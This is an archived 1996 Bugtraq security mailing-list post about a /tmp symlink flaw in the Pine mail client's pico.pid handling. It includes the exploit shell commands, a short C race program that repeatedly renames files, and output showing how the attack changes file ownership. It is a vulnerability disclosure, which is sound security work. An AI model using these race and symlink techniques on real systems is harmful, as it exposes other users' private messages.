Bugtraq mailing list archives
Re: message rejected: Re: [linux-security] Pine security problem.
From: dupuis () lei ucl ac be (Pascal A. Dupuis)
Date: Fri, 13 Sep 1996 10:07:19 +0200
Hello, I got a bunch of messages in reply to Re: Pine Security problem. Here is a summary: First of all, the exploit is straightforward with Linux : ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp; the /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and everybody could have a look on composed message. I tried also Rogier Wolff suggestion about the flipperlink program , running at high processor load to have swapping (compiling the kernel)
main (int argc,char **argv) { while (1) { rename (argv[1],argv[2]); rename (argv[2],argv[1]); } }
and run it with :
cd /tmp ln -s hacker.tmp pico.pid flipperlink pico.pid bla
Once the alternate editor is invoqued, the hacker.tmp, if not existing, is created 600, owned by the pine user. At this time, the toggle stop working as long as the alternate editor is working. the amasing fact is the ownership : ls -l /tmp lrwxrwxrwx 1 hacker grp 10 Sep 13 09:49 bla ->hacker.tmp -rw------- 1 dupuis grp 3042 Sep 13 09:50 hacker.tmp hacker> more blah hacker>blah: permission denied It is thus the ownership of the destination file which is used. Greetings Pascal A. Dupuis -- Information Science is emerging from the Prehistoric Ages, but its language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...
Current thread:
- Re: message rejected: Re: [linux-security] Pine security problem. Pascal A. Dupuis (Sep 13)